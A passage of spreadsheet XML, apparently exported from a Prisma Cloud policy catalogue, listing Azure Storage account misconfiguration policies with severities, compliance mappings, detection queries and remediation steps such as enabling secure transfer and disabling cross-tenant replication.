          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = totalPublicContainers &gt; 0 and (properties.allowBlobPublicAccess is true or properties.allowBlobPublicAccess does not exist)
{"category":"Networking","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA2447" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2447" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2447" t="inlineStr">
        <is>
          <t>PC-AZR-STO-299-CKV_AZURE_190</t>
        </is>
      </c>
      <c r="AD2447" t="b">
        <v>1</v>
      </c>
      <c r="AE2447" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2447" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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pcs-alert-rule - Notifications:, AccountGroups:Default Account Group;,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7" t="inlineStr">
        <is>
          <t>7a506ab4-d0a2-48ee-a6f5-75a97f11397d</t>
        </is>
      </c>
      <c r="AI2447" t="inlineStr">
        <is>
          <t>c085d057-d5a4-4118-afdf-f653e6b47995</t>
        </is>
      </c>
      <c r="AJ2447" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2447" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2448">
      <c r="A2448" t="inlineStr"/>
      <c r="B2448" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2448" s="2" t="inlineStr"/>
      <c r="D2448" t="inlineStr"/>
      <c r="E2448" t="inlineStr"/>
      <c r="F2448" t="inlineStr"/>
      <c r="G2448" t="b">
        <v>1</v>
      </c>
      <c r="H24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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2448" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2448" t="inlineStr">
        <is>
          <t>Data exposure risk due to Azure Storage account containing sensitive information and not configured with secure transfer</t>
        </is>
      </c>
      <c r="L2448" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2448" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2448" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2448" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2448" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2448" t="inlineStr"/>
      <c r="R2448" t="inlineStr"/>
      <c r="S2448" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2448" t="b">
        <v>0</v>
      </c>
      <c r="U2448" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2448" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2448" t="inlineStr">
        <is>
          <t>This policy identifies potential data breach risk due to Azure Storage account containing sensitive information and not configured with secure transfer.
The combination of sensitive data in the storage asset and not configured with secure transfer increases the risk of unauthorized access and data exposure. When secure transfer required is enabled, REST APIs to access your storage accounts connect using HTTPs any requests using HTTP will be rejected.
Immediate attention is required to configure secure transfer feature reported for the Storage account as soon as possible and enforce stricter access methods for reported Storage account as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2448" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
To enable secure transfer feature on your storage account, follow below URL:
https://learn.microsoft.com/en-gb/azure/storage/common/storage-require-secure-transfer#require-secure-transfer-for-an-existing-storage-account
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2448" t="inlineStr"/>
      <c r="Z2448" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage Account without Secure transfer enabled','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2448" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2448" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:06</t>
        </is>
      </c>
      <c r="AC2448" t="inlineStr"/>
      <c r="AD2448" t="b">
        <v>1</v>
      </c>
      <c r="AE2448" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2448" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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8" t="inlineStr">
        <is>
          <t>83f29de0-31f4-4925-a239-f0fcca7674af</t>
        </is>
      </c>
      <c r="AI2448" t="inlineStr">
        <is>
          <t>4863ec03-1e8d-4179-9aec-9031c16cb39c</t>
        </is>
      </c>
      <c r="AJ2448" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2448" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2449">
      <c r="A2449" t="inlineStr">
        <is>
          <t>ISO 27001:2013, HIPAA, PCI DSS v4.0, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, NIST CSF v2.0, APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], Fedramp (Moderate), NIST 800-53 Rev 5, CIS v1.2.0 (Azure), ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v12, CIS Controls v8.1, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Telecommunications Security Act - TSA, CIS v1.1 (Azure), Azure Security Benchmark (v3), NIST SP 800-171 Revision 2, CSA CCM v4.0.12, Fedramp (Low), CIS Controls v7.1, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4, CRI Profile v1.2.1, NIST 800-53 Rev4, ISO 27002:2022, ISO 27001:2013, SOC 2, CIS v2.0.0 (Azure) Level 1, TX-RAMP Level 1, GDPR, Telecommunications Security Act - TSA, CIS v1.4.0 (Azure), Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, PCI DSS v4.0, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, DORA, NIST CSF v2.0, PCI DSS v3.2.1, PCI DSS v4.0, NIST 800-53 Rev4, MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, ISO/IEC 27001:2022, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v1.3.1 (Azure), CIS Controls v8.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), ISO 27001:2013, CSA CCM v3.0.1, APRA (CPS 234) Information Security, NIST CSF, ITSG-33, CRI Profile v1.2.1, SOC 2, NIST CSF, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, GDPR, CRI Profile v2.0, HIPAA, SOC 2, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, CIS Controls v8, Fedramp (Moderate), Brazilian Data Protection Law (LGPD), CIS v2.1.0 (Azure) Level 1, CSA CCM v3.0.1, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CIS v1.3.0 (Azure), Azure Security Benchmark (v2), NIST SP 800-172, HITRUST CSF v9.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v1.5.0 (Azure) - Level 1, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2449" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2449" s="2" t="inlineStr"/>
      <c r="D2449" t="inlineStr"/>
      <c r="E2449" t="inlineStr"/>
      <c r="F2449" t="inlineStr"/>
      <c r="G2449" t="b">
        <v>1</v>
      </c>
      <c r="H24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49" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2449" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2449" t="inlineStr">
        <is>
          <t>Azure Storage Account without Secure transfer enabled</t>
        </is>
      </c>
      <c r="L2449" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2449" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2449" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2449" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2449" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2449" t="inlineStr">
        <is>
          <t>TA0009</t>
        </is>
      </c>
      <c r="R2449" t="inlineStr">
        <is>
          <t>T1530 - Data from Cloud Storage (TA0009)</t>
        </is>
      </c>
      <c r="S2449" t="inlineStr">
        <is>
          <t>Attack Path Rule,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2449" t="b">
        <v>1</v>
      </c>
      <c r="U2449" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2449" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2449" t="inlineStr">
        <is>
          <t>This policy identifies Storage accounts which have Secure transfer feature disabled. The secure transfer option enhances the security of your storage account by only allowing requests to the storage account by a secure connection.
When "secure transfer required" is disabled,REST APIs to access your storage accounts may connect over insecure HTTP which is not advised. Hence, it is highly recommended to enable secure transfer feature on your storage account.
NOTE: Azure storage doesn't support HTTPs for custom domain names, this option is not applied when using a custom domain name. Additionally, this property is not applicable for NFS Azure file shares to work.</t>
        </is>
      </c>
      <c r="X2449" t="inlineStr">
        <is>
          <t>To enable secure transfer feature on your storage account, follow below URL:
https://learn.microsoft.com/en-gb/azure/storage/common/storage-require-secure-transfer#require-secure-transfer-for-an-existing-storage-account 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/azr-general-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/azr-general-3</t>
        </is>
      </c>
      <c r="Y2449" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Storage/storageAccounts/*' permission. Successful execution will enable secure transfer for this storage account.",
'impact': 'enable secure transfer for this storage account',
'cliScriptTemplate': 'az storage account update --ids $resourceId --https-only true'</t>
        </is>
      </c>
      <c r="Z2449" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = (properties.supportsHttpsTrafficOnly does not exist or properties.supportsHttpsTrafficOnly is false) as X; config from cloud.resource where api.name = 'azure-storage-file-shares' as Y; filter '($.X.kind does not equal ignore case "FileStorage") or ($.X.kind equal ignore case "FileStorage" and $.Y.id contains $.X.name and $.Y.properties.enabledProtocols does not contain NFS)'; show X;
{"category":"Networking","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA2449" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2449" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2449" t="inlineStr">
        <is>
          <t>PC-AZR-STO-104-CKV_AZURE_3</t>
        </is>
      </c>
      <c r="AD2449" t="b">
        <v>1</v>
      </c>
      <c r="AE2449" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2449" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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49" t="inlineStr">
        <is>
          <t>bc4e467f-10fa-471e-aa9b-28981dc73e93</t>
        </is>
      </c>
      <c r="AI2449" t="inlineStr">
        <is>
          <t>4a6a7642-06f0-4e51-aa79-a7c06afffdc5</t>
        </is>
      </c>
      <c r="AJ2449" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2449" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2450">
      <c r="A2450" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, SOC 2, CIS v2.1.0 (Azure) Level 1</t>
        </is>
      </c>
      <c r="B2450" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2450" s="2" t="inlineStr"/>
      <c r="D2450" t="inlineStr"/>
      <c r="E2450" t="inlineStr"/>
      <c r="F2450" t="inlineStr"/>
      <c r="G2450" t="b">
        <v>1</v>
      </c>
      <c r="H24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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2450" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2450" t="inlineStr">
        <is>
          <t>Azure Storage account with cross tenant replication enabled</t>
        </is>
      </c>
      <c r="L2450" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2450" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2450" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2450" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2450" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2450" t="inlineStr">
        <is>
          <t>Storage Accounts</t>
        </is>
      </c>
      <c r="R2450" t="inlineStr">
        <is>
          <t>3.16</t>
        </is>
      </c>
      <c r="S2450" t="inlineStr"/>
      <c r="T2450" t="b">
        <v>1</v>
      </c>
      <c r="U2450" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2450" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2450" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage accounts that are enabled with cross tenant replication.
Azure Storage account cross tenant replication allows data to be replicated across multiple Azure tenants. Though this feature is beneficial for data availability it also poses a significant security risk if not properly managed. Possible risks include unauthorized access to data, data leaks, and compliance violations. Disabling Cross Tenant Replication reduces the risk of unauthorized data access and prevents the accidental sharing of sensitive information.
As best practice, it is recommended to disable cross tenant replication on your storage accounts.</t>
        </is>
      </c>
      <c r="X2450" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Storage Account dashboard
3. Click on the reported Storage Account
4. Under 'Data management', select 'Object replication'
5. Select 'Advanced settings'
6. Uncheck 'Allow cross-tenant replication'
7. Click on 'OK'</t>
        </is>
      </c>
      <c r="Y2450" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Storage/storageAccounts/*' permission. Successful execution will disable cross tenant replication in Storage Accounts.",
'impact': 'Disable cross tenant replication in Azure Storage Account',
'cliScriptTemplate': 'az storage account update --name $resourceName --resource-group $resourceGroup --allow-cross-tenant-replication false'</t>
        </is>
      </c>
      <c r="Z2450" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.allowCrossTenantReplication exists and properties.allowCrossTenantReplication is true</t>
        </is>
      </c>
      <c r="AA2450" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2450" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2450" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1171</t>
        </is>
      </c>
      <c r="AD2450" t="b">
        <v>1</v>
      </c>
      <c r="AE2450" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2450" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>61ab863b-83ac-40a4-834d-2bc60f116964</t>
        </is>
      </c>
      <c r="AI2450" t="inlineStr">
        <is>
          <t>7bd3a894-eca7-418b-8819-c38826d2c932</t>
        </is>
      </c>
      <c r="AJ2450" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2450" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2451">
      <c r="A2451" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, CIS v2.0.0 (Azure) Level 2, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, CIS v2.1.0 (Azure) Level 2</t>
        </is>
      </c>
      <c r="B2451" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2451" s="2" t="inlineStr"/>
      <c r="D2451" t="inlineStr"/>
      <c r="E2451" t="inlineStr"/>
      <c r="F2451" t="inlineStr"/>
      <c r="G2451" t="b">
        <v>1</v>
      </c>
      <c r="H24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51" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2451" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2451" t="inlineStr">
        <is>
          <t>Azure Storage account diagnostic setting for queue is disabled</t>
        </is>
      </c>
      <c r="L2451" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2451" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2451" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2451" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2451" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2451" t="inlineStr">
        <is>
          <t>Storage Accounts</t>
        </is>
      </c>
      <c r="R2451" t="inlineStr">
        <is>
          <t>3.5</t>
        </is>
      </c>
      <c r="S2451" t="inlineStr"/>
      <c r="T2451" t="b">
        <v>0</v>
      </c>
      <c r="U2451" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2451" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2451" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage account queues that have diagnostic logging disabled.
By enabling diagnostic settings, you can capture various types of activities and events occurring within these storage account queues. These logs provide valuable insights into the operations, performance, and security of the storage account queues.
As a best practice, it is recommended to enable diagnostic logs on all storage account queues.</t>
        </is>
      </c>
      <c r="X2451" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to the Storage Accounts dashboard
3. Click on the reported Storage account
4. Under the 'Monitoring' menu, click on 'Diagnostic settings'
5. Select the queue resource
6. Under 'Diagnostic settings', click on 'Add diagnostic setting'
7. At the top, enter the 'Diagnostic setting name'
8. Under 'Logs', select all the checkboxes under 'Categories'
9. Under 'Destination details', select the destination for logging
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2451" t="inlineStr"/>
      <c r="Z2451" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded as X; config from cloud.resource where api.name = 'azure-storage-account-queue-diagnostic-settings' AND json.rule = properties.logs[*].enabled all true as Y; filter 'not($.X.name equal ignore case $.Y.StorageAccountName)'; show X;</t>
        </is>
      </c>
      <c r="AA2451" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2451" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2451" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1283</t>
        </is>
      </c>
      <c r="AD2451" t="b">
        <v>1</v>
      </c>
      <c r="AE2451" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2451" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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51" t="inlineStr">
        <is>
          <t>29ad9a92-4da3-4f44-8acf-77305c764afe</t>
        </is>
      </c>
      <c r="AI2451" t="inlineStr">
        <is>
          <t>1fd01612-3e42-4dcc-ae4d-23eda4efe517</t>
        </is>
      </c>
      <c r="AJ2451" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2451" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2452">
      <c r="A2452" t="inlineStr"/>
      <c r="B2452" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2452" s="2" t="inlineStr"/>
      <c r="D2452" t="inlineStr"/>
      <c r="E2452" t="inlineStr"/>
      <c r="F2452" t="inlineStr"/>
      <c r="G2452" t="b">
        <v>1</v>
      </c>
      <c r="H24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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2452" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2452" t="inlineStr">
        <is>
          <t>Data breach risk due to publicly accessible Azure Storage account containing sensitive information</t>
        </is>
      </c>
      <c r="L2452" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE,DISCOVERY</t>
        </is>
      </c>
      <c r="M2452" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2452" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2452" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2452" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2452" t="inlineStr"/>
      <c r="R2452" t="inlineStr"/>
      <c r="S2452" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2452" t="b">
        <v>0</v>
      </c>
      <c r="U2452" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2452" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2452" t="inlineStr">
        <is>
          <t>This policy identifies  potential data breach risk due to Azure Storage accounts publicly exposed and containing sensitive information.
The combination of public access permissions and sensitive data in the storage asset increases the risk of unauthorized access and data exfiltration. Proper access control and data protection measures should be in place to prevent potential compromise of critical data.
Immediate attention is required to restrict public exposure reported for the Storage account as soon as possible and enforce stricter access methods for reported Storage account as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2452"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To change the default network access rule, follow below URL:
https://learn.microsoft.com/en-us/azure/storage/common/storage-network-security?tabs=azure-portal#change-the-default-network-access-rule 
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2452" t="inlineStr"/>
      <c r="Z2452" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure storage account has a blob container with public access','Azure Storage Account default network access is set to \'Allow\'','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2452" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2452" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:06</t>
        </is>
      </c>
      <c r="AC2452" t="inlineStr"/>
      <c r="AD2452" t="b">
        <v>1</v>
      </c>
      <c r="AE2452" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2452" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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2" t="inlineStr">
        <is>
          <t>9182856c-19b6-4ae6-975f-c3f1675b5211</t>
        </is>
      </c>
      <c r="AI2452" t="inlineStr">
        <is>
          <t>9f9fb3e5-1d87-4f9d-b6a1-62a0e79e4b47</t>
        </is>
      </c>
      <c r="AJ2452" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2452" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2453">
      <c r="A2453" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), MTSBv2_Azure, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, Azure Security Benchmark (v2), CIS v1.4.0 (Azure), APRA (CPS 234) Information Security, ITSG-33, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v.11.2.0, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, CSA CCM v.4.0.1, Copy of CIS v1.2.0 (Azure), testazure, SOC 2, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, TX-RAMP Level 1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, Matt's ATT&amp;ACK, CSA CCM v4.0.12, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Azure Security Benchmark (v3), CIS v1.3.1 (Azure), CIS v1.3.0 (Azure), Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v1.2.0 (Azure), CIS Controls v8, TX-RAMP Level 2, NIST CSF, Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v10.0 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, CIS v2.1.0 (Azure) Level 2, ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, PCI DSS v3.2.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, MLPS 2.0 (Level 2), Azure Security Benchmark (v3), ISO/IEC 27017:2015, Azure Security Benchmark (v2), Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Copy of Azure Security Benchmark (v3), MITRE ATT&amp;CK v8.2 [Deprecated], CIS v1.1 (Azure), HITRUST v.9.4.2 [Deprecated], Azure Security Benchmark (v3), Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v6.3 [Deprecated], CIS Controls v8.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CCPA 2018, ITSG-33, PIPEDA, CyberSecurity Law of the People's Republic of China, kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), CIS v2.0.0 (Azure) Level 2, Secure Controls Framework (SCF) - 2022.2.1, Azure Security Benchmark (v3), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2453" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2453" s="2" t="inlineStr"/>
      <c r="D2453" t="inlineStr"/>
      <c r="E2453" t="inlineStr"/>
      <c r="F2453" t="inlineStr"/>
      <c r="G2453" t="b">
        <v>1</v>
      </c>
      <c r="H24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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2453" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2453" t="inlineStr">
        <is>
          <t>Azure Storage Account 'Trusted Microsoft Services' access not enabled</t>
        </is>
      </c>
      <c r="L2453" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2453" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2453" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2453" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2453" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2453" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2453" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2453" t="inlineStr">
        <is>
          <t>Storage</t>
        </is>
      </c>
      <c r="T2453" t="b">
        <v>1</v>
      </c>
      <c r="U2453" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
